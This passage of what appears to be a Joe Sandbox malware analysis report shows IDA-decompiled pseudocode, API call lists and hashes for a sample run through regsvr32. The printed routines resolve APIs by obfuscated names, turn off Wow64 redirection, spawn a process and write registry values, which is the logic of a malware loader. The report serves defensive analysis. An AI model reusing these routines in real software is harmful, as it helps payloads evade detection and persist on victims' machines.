                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: lstrlen$CountFreeHeapTick
                                    • String ID:
                                    • API String ID: 2535036572-0
                                    • Opcode ID: 2258cf28f6e833c5ee5580600e713b88a24b5dd11d8319af85ab4da2dccc3545
                                    • Instruction ID: 2baaf0c51160b1191ec10cf0586b36304737ba280d6833fbc80e89c9100cccd7
                                    • Opcode Fuzzy Hash: 2258cf28f6e833c5ee5580600e713b88a24b5dd11d8319af85ab4da2dccc3545
                                    • Instruction Fuzzy Hash: A9416A7A900219FBCF11AFA4CD08A9E7BB5EF49354F154090FE04A7262D7369B54EB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 61%
                                    			E001A4BD9(void* __eax, void* __ecx) {
                                    				long _v8;
                                    				void* _v12;
                                    				void* _v16;
                                    				void* _v28;
                                    				long _v32;
                                    				void _v104;
                                    				char _v108;
                                    				long _t39;
                                    				intOrPtr _t43;
                                    				intOrPtr _t50;
                                    				void* _t52;
                                    				intOrPtr _t53;
                                    				void* _t61;
                                    				intOrPtr* _t66;
                                    				intOrPtr* _t73;
                                    				intOrPtr* _t76;
                                    
                                    				_t1 = __eax + 0x14; // 0x74183966
                                    				_t71 =  *_t1;
                                    				_t39 = E001A2039(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                                    				_v8 = _t39;
                                    				if(_t39 != 0) {
                                    					L12:
                                    					return _v8;
                                    				}
                                    				E001A7801( *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 8)), _v12);
                                    				_t43 = _v12(_v12);
                                    				_v8 = _t43;
                                    				if(_t43 == 0 && ( *0x1aa2b8 & 0x00000001) != 0) {
                                    					_v32 = 0;
                                    					asm("stosd");
                                    					asm("stosd");
                                    					asm("stosd");
                                    					_v108 = 0;
                                    					memset( &_v104, 0, 0x40);
                                    					_t50 =  *0x1aa2d4; // 0x314d7d0
                                    					_t18 = _t50 + 0x1ab55b; // 0x73797325
                                    					_t52 = E001A6ECF(_t18);
                                    					_v12 = _t52;
                                    					if(_t52 == 0) {
                                    						_v8 = 8;
                                    					} else {
                                    						_t53 =  *0x1aa2d4; // 0x314d7d0
                                    						_t20 = _t53 + 0x1ab73d; // 0x32f8f0d
                                    						_t21 = _t53 + 0x1ab0af; // 0x4e52454b
                                    						_t66 = GetProcAddress(GetModuleHandleA(_t21), _t20);
                                    						if(_t66 == 0) {
                                    							_v8 = 0x7f;
                                    						} else {
                                    							_t73 = __imp__;
                                    							_v108 = 0x44;
                                    							 *_t73(0);
                                    							_t61 =  *_t66(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32);
                                    							 *_t73(1);
                                    							if(_t61 == 0) {
                                    								_v8 = GetLastError();
                                    							} else {
                                    								CloseHandle(_v28);
                                    								CloseHandle(_v32);
                                    							}
                                    						}
                                    						HeapFree( *0x1aa290, 0, _v12);
                                    					}
                                    				}
                                    				_t76 = _v16;
                                    				 *((intOrPtr*)(_t76 + 0x18))( *((intOrPtr*)(_t76 + 0x1c))( *_t76));
                                    				E001A77EC(_t76);
                                    				goto L12;
                                    			}




















                                    APIs
                                      • Part of subcall function 001A2039: GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,001A4BF5,?,?,?,?,00000000,00000000), ref: 001A205E
                                      • Part of subcall function 001A2039: GetProcAddress.KERNEL32(00000000,7243775A,?,?,?,001A4BF5,?,?,?,?,00000000), ref: 001A2080
                                      • Part of subcall function 001A2039: GetProcAddress.KERNEL32(00000000,614D775A,?,?,?,001A4BF5,?,?,?,?,00000000), ref: 001A2096
                                      • Part of subcall function 001A2039: GetProcAddress.KERNEL32(00000000,6E55775A,?,?,?,001A4BF5,?,?,?,?,00000000), ref: 001A20AC
                                      • Part of subcall function 001A2039: GetProcAddress.KERNEL32(00000000,4E6C7452,?,?,?,001A4BF5,?,?,?,?,00000000), ref: 001A20C2
                                      • Part of subcall function 001A2039: GetProcAddress.KERNEL32(00000000,6C43775A,?,?,?,001A4BF5,?,?,?,?,00000000), ref: 001A20D8
                                    • memset.NTDLL ref: 001A4C43
                                      • Part of subcall function 001A6ECF: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,001A4C5C,73797325), ref: 001A6EE0
                                      • Part of subcall function 001A6ECF: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 001A6EFA
                                    • GetModuleHandleA.KERNEL32(4E52454B,032F8F0D,73797325), ref: 001A4C7A
                                    • GetProcAddress.KERNEL32(00000000), ref: 001A4C81
                                    • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 001A4C9B
                                    • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 001A4CB9
                                    • CloseHandle.KERNEL32(00000000), ref: 001A4CC8
                                    • CloseHandle.KERNEL32(?), ref: 001A4CCD
                                    • GetLastError.KERNEL32 ref: 001A4CD1
                                    • HeapFree.KERNEL32(00000000,?), ref: 001A4CED
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemset
                                    • String ID:
                                    • API String ID: 91923200-0
                                    • Opcode ID: 950da1a5cf613c4f8789d8ef60b0a01cd830b1253e4e0523e07b41255d400301
                                    • Instruction ID: 4786462bf85834d1a43bb4cce7c3f98f64277367e8754a886db90167172014e7
                                    • Opcode Fuzzy Hash: 950da1a5cf613c4f8789d8ef60b0a01cd830b1253e4e0523e07b41255d400301
                                    • Instruction Fuzzy Hash: 26316879901218EFCB119FE4DD48ADEBFB8EF4A350F204051F509A3121C775AA85DBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetConsoleCP.KERNEL32 ref: 6E2CA751
                                    • __fassign.LIBCMT ref: 6E2CA7CC
                                    • __fassign.LIBCMT ref: 6E2CA7E7
                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 6E2CA80D
                                    • WriteFile.KERNEL32(?,?,00000000,6E2CAE84,00000000), ref: 6E2CA82C
                                    • WriteFile.KERNEL32(?,?,00000001,6E2CAE84,00000000), ref: 6E2CA865
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                    • String ID:
                                    • API String ID: 1324828854-0
                                    • Opcode ID: fe6c7dee24c67754930c850e23cf3a04e7cad20d86e64c15b0dae96bc008fd00
                                    • Instruction ID: a4d73696fb2a4cb586743ace3f296f72de01bc1d60420874ec391c87d526880e
                                    • Opcode Fuzzy Hash: fe6c7dee24c67754930c850e23cf3a04e7cad20d86e64c15b0dae96bc008fd00
                                    • Instruction Fuzzy Hash: 7651A3B194024D9FDB40CFE8D885AEEBBBAFF09710F14461AE566E7280E7709941CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 6E2CA49E: _free.LIBCMT ref: 6E2CA4C7
                                    • _free.LIBCMT ref: 6E2CA528
                                      • Part of subcall function 6E2C761D: HeapFree.KERNEL32(00000000,00000000), ref: 6E2C7633
                                      • Part of subcall function 6E2C761D: GetLastError.KERNEL32(?,?,6E2CA4CC,?,00000000,?,00000000,?,6E2CA4F3,?,00000007,?,?,6E2C90D9,?,?), ref: 6E2C7645
                                    • _free.LIBCMT ref: 6E2CA533
                                    • _free.LIBCMT ref: 6E2CA53E
                                    • _free.LIBCMT ref: 6E2CA592
                                    • _free.LIBCMT ref: 6E2CA59D
                                    • _free.LIBCMT ref: 6E2CA5A8
                                    • _free.LIBCMT ref: 6E2CA5B3
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: f4371d2fd168166f85a9f3178bf51c2b87afea5821cdea0538c50897a6f4803b
                                    • Instruction ID: 9aeee2fd557bd9112e3c243c43ce61377dc0194e0026c38971c19604c2da8e75
                                    • Opcode Fuzzy Hash: f4371d2fd168166f85a9f3178bf51c2b87afea5821cdea0538c50897a6f4803b
                                    • Instruction Fuzzy Hash: A511F1B5980B0CB7DAB1ABF0CC0AFC777AE7F04B04F404E15629A66491DF65A5148B52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetLastError.KERNEL32(?,?,6E2C7EEB), ref: 6E2C6D40
                                    • _free.LIBCMT ref: 6E2C6D73
                                    • _free.LIBCMT ref: 6E2C6D9B
                                    • SetLastError.KERNEL32(00000000,?,?,6E2C7EEB), ref: 6E2C6DA8
                                    • SetLastError.KERNEL32(00000000,?,?,6E2C7EEB), ref: 6E2C6DB4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ErrorLast$_free
                                    • String ID: e
                                    • API String ID: 3170660625-3352636342
                                    • Opcode ID: 5bc92fdcbd2ed48f1e55119b898106042a78130af5f728b19499137945d8953a
                                    • Instruction ID: a3099bb3cb9c983766b6397650b66e9b500a3dbf25eaa9f5c856540f613f873a
                                    • Opcode Fuzzy Hash: 5bc92fdcbd2ed48f1e55119b898106042a78130af5f728b19499137945d8953a
                                    • Instruction Fuzzy Hash: C8F0FE391A4D0E57CAC113F8DD8DEAA122F9FC2F39F250714F518921C4DF6588018173
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 001A740B: CoCreateInstance.OLE32(9BA05972,00000000,00000004,032F8C18,00000000), ref: 001A743E
                                    • SysAllocString.OLEAUT32(?), ref: 001A1A10
                                    • SysAllocString.OLEAUT32(0070006F), ref: 001A1A24
                                    • SysAllocString.OLEAUT32(00000000), ref: 001A1A36
                                    • SysFreeString.OLEAUT32(00000000), ref: 001A1A9A
                                    • SysFreeString.OLEAUT32(00000000), ref: 001A1AA9
                                    • SysFreeString.OLEAUT32(00000000), ref: 001A1AB4
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: String$AllocFree$CreateInstance
                                    • String ID:
                                    • API String ID: 1867060851-0
                                    • Opcode ID: ac4d104d53351ae3d1d628d2c646c0dca449288a4cda65c3d1a5304f7ee43898
                                    • Instruction ID: 53d5e42d8d0e198c0b9c0b331373d73959523cd86eacbac6ae18305010c7a857
                                    • Opcode Fuzzy Hash: ac4d104d53351ae3d1d628d2c646c0dca449288a4cda65c3d1a5304f7ee43898
                                    • Instruction Fuzzy Hash: FA318136D00609AFDF01DFB8C844A9FBBBAAF4A310F154425ED10EB120DB719D46CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E001A2039(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                    				intOrPtr _v8;
                                    				intOrPtr _t23;
                                    				intOrPtr _t26;
                                    				_Unknown_base(*)()* _t28;
                                    				intOrPtr _t30;
                                    				_Unknown_base(*)()* _t32;
                                    				intOrPtr _t33;
                                    				_Unknown_base(*)()* _t35;
                                    				intOrPtr _t36;
                                    				_Unknown_base(*)()* _t38;
                                    				intOrPtr _t39;
                                    				_Unknown_base(*)()* _t41;
                                    				intOrPtr _t44;
                                    				struct HINSTANCE__* _t48;
                                    				intOrPtr _t54;
                                    
                                    				_t54 = E001A77D7(0x20);
                                    				if(_t54 == 0) {
                                    					_v8 = 8;
                                    				} else {
                                    					_t23 =  *0x1aa2d4; // 0x314d7d0
                                    					_t1 = _t23 + 0x1ab11a; // 0x4c44544e
                                    					_t48 = GetModuleHandleA(_t1);
                                    					_t26 =  *0x1aa2d4; // 0x314d7d0
                                    					_t2 = _t26 + 0x1ab787; // 0x7243775a
                                    					_v8 = 0x7f;
                                    					_t28 = GetProcAddress(_t48, _t2);
                                    					 *(_t54 + 0xc) = _t28;
                                    					if(_t28 == 0) {
                                    						L8:
                                    						E001A77EC(_t54);
                                    					} else {
                                    						_t30 =  *0x1aa2d4; // 0x314d7d0
                                    						_t5 = _t30 + 0x1ab774; // 0x614d775a
                                    						_t32 = GetProcAddress(_t48, _t5);
                                    						 *(_t54 + 0x10) = _t32;
                                    						if(_t32 == 0) {
                                    							goto L8;
                                    						} else {
                                    							_t33 =  *0x1aa2d4; // 0x314d7d0
                                    							_t7 = _t33 + 0x1ab797; // 0x6e55775a
                                    							_t35 = GetProcAddress(_t48, _t7);
                                    							 *(_t54 + 0x14) = _t35;
                                    							if(_t35 == 0) {
                                    								goto L8;
                                    							} else {
                                    								_t36 =  *0x1aa2d4; // 0x314d7d0
                                    								_t9 = _t36 + 0x1ab756; // 0x4e6c7452
                                    								_t38 = GetProcAddress(_t48, _t9);
                                    								 *(_t54 + 0x18) = _t38;
                                    								if(_t38 == 0) {
                                    									goto L8;
                                    								} else {
                                    									_t39 =  *0x1aa2d4; // 0x314d7d0
                                    									_t11 = _t39 + 0x1ab7ac; // 0x6c43775a
                                    									_t41 = GetProcAddress(_t48, _t11);
                                    									 *(_t54 + 0x1c) = _t41;
                                    									if(_t41 == 0) {
                                    										goto L8;
                                    									} else {
                                    										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                    										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                    										_t44 = E001A3C64(_t54, _a8);
                                    										_v8 = _t44;
                                    										if(_t44 != 0) {
                                    											goto L8;
                                    										} else {
                                    											 *_a12 = _t54;
                                    										}
                                    									}
                                    								}
                                    							}
                                    						}
                                    					}
                                    				}
                                    				return _v8;
                                    			}



















                                    APIs
                                      • Part of subcall function 001A77D7: RtlAllocateHeap.NTDLL(00000000,00000000,001A1275), ref: 001A77E3
                                    • GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,001A4BF5,?,?,?,?,00000000,00000000), ref: 001A205E
                                    • GetProcAddress.KERNEL32(00000000,7243775A,?,?,?,001A4BF5,?,?,?,?,00000000), ref: 001A2080
                                    • GetProcAddress.KERNEL32(00000000,614D775A,?,?,?,001A4BF5,?,?,?,?,00000000), ref: 001A2096
                                    • GetProcAddress.KERNEL32(00000000,6E55775A,?,?,?,001A4BF5,?,?,?,?,00000000), ref: 001A20AC
                                    • GetProcAddress.KERNEL32(00000000,4E6C7452,?,?,?,001A4BF5,?,?,?,?,00000000), ref: 001A20C2
                                    • GetProcAddress.KERNEL32(00000000,6C43775A,?,?,?,001A4BF5,?,?,?,?,00000000), ref: 001A20D8
                                      • Part of subcall function 001A3C64: memset.NTDLL ref: 001A3CE3
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: AddressProc$AllocateHandleHeapModulememset
                                    • String ID:
                                    • API String ID: 1886625739-0
                                    • Opcode ID: 68dcd5972cc145f57e5be571ed9e8f9ff850678aca5a7e4d80848a75ec63fd2a
                                    • Instruction ID: 4d703aa8960adacb1fffc90cce79f958e72fda087f0b57f77749837e7b3e96d4
                                    • Opcode Fuzzy Hash: 68dcd5972cc145f57e5be571ed9e8f9ff850678aca5a7e4d80848a75ec63fd2a
                                    • Instruction Fuzzy Hash: 6D219AB520434AAFD710DFA8CD84E6A7BFCEF4A350B11406AF908C7252E738E904CB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetLastError.KERNEL32(?,?,6E2C49B8,6E2C39D0,6E2C33DA), ref: 6E2C4D04
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E2C4D12
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E2C4D2B
                                    • SetLastError.KERNEL32(00000000,?,6E2C49B8,6E2C39D0,6E2C33DA), ref: 6E2C4D7D
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ErrorLastValue___vcrt_
                                    • String ID:
                                    • API String ID: 3852720340-0
                                    • Opcode ID: 36e973c67cb725f467542caaafa98e4ef51df2d742f9224c1283eba3a1563535
                                    • Instruction ID: ff6ba6ac8d5cf30012525bce9827846ac9bf424b8e31770d3d08974bb887879c
                                    • Opcode Fuzzy Hash: 36e973c67cb725f467542caaafa98e4ef51df2d742f9224c1283eba3a1563535
                                    • Instruction Fuzzy Hash: E901F93266DF1B5FDAD026F5ECC89672E6BEB06F7D720032DE115800E4DF918802C196
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 88%
                                    			E001A5AFA(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                    				signed int _v8;
                                    				char _v12;
                                    				signed int* _v16;
                                    				char _v284;
                                    				void* __esi;
                                    				char* _t59;
                                    				intOrPtr* _t60;
                                    				intOrPtr _t64;
                                    				char _t65;
                                    				intOrPtr _t68;
                                    				intOrPtr _t69;
                                    				intOrPtr _t71;
                                    				void* _t73;
                                    				signed int _t81;
                                    				void* _t91;
                                    				void* _t92;
                                    				char _t98;
                                    				signed int* _t100;
                                    				intOrPtr* _t101;
                                    				void* _t102;
                                    
                                    				_t92 = __ecx;
                                    				_v8 = _v8 & 0x00000000;
                                    				_t98 = _a16;
                                    				if(_t98 == 0) {
                                    					__imp__( &_v284,  *0x1aa38c);
                                    					_t91 = 0x80000002;
                                    					L6:
                                    					_t59 = E001A5691( &_v284,  &_v284);
                                    					_a8 = _t59;
                                    					if(_t59 == 0) {
                                    						_v8 = 8;
                                    						L29:
                                    						_t60 = _a20;
                                    						if(_t60 != 0) {
                                    							 *_t60 =  *_t60 + 1;
                                    						}
                                    						return _v8;
                                    					}
                                    					_t101 = _a24;
                                    					if(E001A611E(_t92, _t97, _t101, _t91, _t59) != 0) {
                                    						L27:
                                    						E001A77EC(_a8);
                                    						goto L29;
                                    					}
                                    					_t64 =  *0x1aa2cc; // 0x32f9f00
                                    					_t16 = _t64 + 0xc; // 0x32f9ff1
                                    					_t65 = E001A5691(_t64,  *_t16);
                                    					_a24 = _t65;
                                    					if(_t65 == 0) {
                                    						L14:
                                    						_t29 = _t101 + 0x14; // 0x102
                                    						_t33 = _t101 + 0x10; // 0x3d001a90
                                    						if(E001A2A18(_t97,  *_t33, _t91, _a8,  *0x1aa384,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
                                    							_t68 =  *0x1aa2d4; // 0x314d7d0
                                    							if(_t98 == 0) {
                                    								_t35 = _t68 + 0x1ab9ef; // 0x4d4c4b48
                                    								_t69 = _t35;
                                    							} else {
                                    								_t34 = _t68 + 0x1ab907; // 0x55434b48
                                    								_t69 = _t34;
                                    							}
                                    							if(E001A3D9E(_t69,  *0x1aa384,  *0x1aa388,  &_a24,  &_a16) == 0) {
                                    								if(_t98 == 0) {
                                    									_t71 =  *0x1aa2d4; // 0x314d7d0
                                    									_t44 = _t71 + 0x1ab892; // 0x74666f53
                                    									_t73 = E001A5691(_t44, _t44);
                                    									_t99 = _t73;
                                    									if(_t73 == 0) {
                                    										_v8 = 8;
                                    									} else {
                                    										_t47 = _t101 + 0x10; // 0x3d001a90
                                    										E001A2A5C( *_t47, _t91, _a8,  *0x1aa388, _a24);
                                    										_t49 = _t101 + 0x10; // 0x3d001a90
                                    										E001A2A5C( *_t49, _t91, _t99,  *0x1aa380, _a16);
                                    										E001A77EC(_t99);
                                    									}
                                    								} else {
                                    									_t40 = _t101 + 0x10; // 0x3d001a90
                                    									E001A2A5C( *_t40, _t91, _a8,  *0x1aa388, _a24);
                                    									_t43 = _t101 + 0x10; // 0x3d001a90
                                    									E001A2A5C( *_t43, _t91, _a8,  *0x1aa380, _a16);
                                    								}
                                    								if( *_t101 != 0) {
                                    									E001A77EC(_a24);
                                    								} else {
                                    									 *_t101 = _a16;
                                    								}
                                    							}
                                    						}
                                    						goto L27;
                                    					}
                                    					_t21 = _t101 + 0x10; // 0x3d001a90
                                    					_t81 = E001A15D7( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
                                    					if(_t81 == 0) {
                                    						_t100 = _v16;
                                    						if(_v12 == 0x28) {
                                    							 *_t100 =  *_t100 & _t81;
                                    							_t26 = _t101 + 0x10; // 0x3d001a90
                                    							E001A2A18(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                                    						}
                                    						E001A77EC(_t100);
                                    						_t98 = _a16;
                                    					}
                                    					E001A77EC(_a24);
                                    					goto L14;
                                    				}
                                    				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                    					goto L29;
                                    				} else {
                                    					_t97 = _a8;
                                    					E001A7801(_t98, _a8,  &_v284);
                                    					__imp__(_t102 + _t98 - 0x117,  *0x1aa38c);
                                    					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                                    					_t91 = 0x80000003;
                                    					goto L6;
                                    				}
                                    			}

                                    APIs
                                    • StrChrA.SHLWAPI(001A17B3,0000005F), ref: 001A5B2D
                                    • lstrcpy.KERNEL32(?,?), ref: 001A5B5A
                                      • Part of subcall function 001A5691: lstrlen.KERNEL32(?,00000000,032F9F00,754B94D8,001A291A,032FA0FD,001A5FB9,001A5FB9,?,001A5FB9,?,69B25F44,E8FA7DD7,00000000), ref: 001A5698
                                      • Part of subcall function 001A5691: mbstowcs.NTDLL ref: 001A56C1
                                      • Part of subcall function 001A5691: memset.NTDLL ref: 001A56D3
                                      • Part of subcall function 001A2A5C: lstrlenW.KERNEL32(?,?,?,001A5CC3,3D001A90,80000002,001A17B3,001A462D,74666F53,4D4C4B48,001A462D,?,3D001A90,80000002,001A17B3,?), ref: 001A2A81
                                      • Part of subcall function 001A77EC: HeapFree.KERNEL32(00000000,00000000,001A1333), ref: 001A77F8
                                    • lstrcpy.KERNEL32(?,00000000), ref: 001A5B7C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                    • String ID: ($\
                                    • API String ID: 3924217599-1512714803
                                    • Opcode ID: 02c3a98ad7e9fa503d07c0738476989574f4cc39ff86b24baca43223242d651c
                                    • Instruction ID: a8a14c0977b8260ed3d374f75ec3710ff13226f69cffd705c2c15a4fdf028179
                                    • Opcode Fuzzy Hash: 02c3a98ad7e9fa503d07c0738476989574f4cc39ff86b24baca43223242d651c
                                    • Instruction Fuzzy Hash: 74519B7A104609FFCF229FA0DC44EAA3BBEFF1A320F108414FA1696565D735DA65EB10
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 32%
                                    			E001A1697(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
                                    				intOrPtr _v36;
                                    				intOrPtr _v44;
                                    				intOrPtr _v48;
                                    				intOrPtr _v52;
                                    				void _v60;
                                    				char _v64;
                                    				long _t18;
                                    				intOrPtr _t22;
                                    				intOrPtr _t23;
                                    				long _t29;
                                    				intOrPtr _t30;
                                    				intOrPtr _t31;
                                    				intOrPtr* _t32;
                                    
                                    				_t30 = __edi;
                                    				_t29 = _a4;
                                    				_t31 = __eax;
                                    				_t18 = E001A19B4(_t29, __edi, __eax);
                                    				_a4 = _t18;
                                    				if(_t18 != 0) {
                                    					memset( &_v60, 0, 0x38);
                                    					_t22 =  *0x1aa2d4; // 0x314d7d0
                                    					_v64 = 0x3c;
                                    					if(_a8 == 0) {
                                    						_t7 = _t22 + 0x1ab4e0; // 0x70006f
                                    						_t23 = _t7;
                                    					} else {
                                    						_t6 = _t22 + 0x1ab90c; // 0x750072
                                    						_t23 = _t6;
                                    					}
                                    					_v36 = _t31;
                                    					_t32 = __imp__;
                                    					_v52 = _t23;
                                    					_v48 = _t29;
                                    					_v44 = _t30;
                                    					 *_t32(0);
                                    					_push( &_v64);
                                    					if( *0x1aa100() != 0) {
                                    						_a4 = _a4 & 0x00000000;
                                    					} else {
                                    						_a4 = GetLastError();
                                    					}
                                    					 *_t32(1);
                                    				}
                                    				return _a4;
                                    			}

                                    APIs
                                      • Part of subcall function 001A19B4: SysAllocString.OLEAUT32(?), ref: 001A1A10
                                      • Part of subcall function 001A19B4: SysAllocString.OLEAUT32(0070006F), ref: 001A1A24
                                      • Part of subcall function 001A19B4: SysAllocString.OLEAUT32(00000000), ref: 001A1A36
                                      • Part of subcall function 001A19B4: SysFreeString.OLEAUT32(00000000), ref: 001A1A9A
                                    • memset.NTDLL ref: 001A16BB
                                    • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 001A16F7
                                    • GetLastError.KERNEL32 ref: 001A1707
                                    • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 001A1718
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
                                    • String ID: <
                                    • API String ID: 593937197-4251816714
                                    • Opcode ID: 40acbde511872c8891d0587b5380ff733b3d9aae68da930a2258006996dc6c96
                                    • Instruction ID: 22dd5eb1d61d056604782d52eea380cc5966f06007d45bd70c69bdeef878afcb
                                    • Opcode Fuzzy Hash: 40acbde511872c8891d0587b5380ff733b3d9aae68da930a2258006996dc6c96
                                    • Instruction Fuzzy Hash: C81179B5900208BBDB10DFA9D884BDA7BBCBB0A380F148016F909E7291D774A544CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 22%
                                    			E001A1ADC(signed int __eax, signed int _a4, signed int _a8) {
                                    				signed int _v8;
                                    				signed int _v12;
                                    				intOrPtr _v16;
                                    				signed int _v20;
                                    				intOrPtr _t81;
                                    				char _t83;
                                    				signed int _t90;
                                    				signed int _t97;
                                    				signed int _t99;
                                    				char _t101;
                                    				unsigned int _t102;
                                    				intOrPtr _t103;
                                    				char* _t107;
                                    				signed int _t110;
                                    				signed int _t113;
                                    				signed int _t118;
                                    				signed int _t122;
                                    				intOrPtr _t124;
                                    
                                    				_t102 = _a8;
                                    				_t118 = 0;
                                    				_v20 = __eax;
                                    				_t122 = (_t102 >> 2) + 1;
                                    				_v8 = 0;
                                    				_a8 = 0;
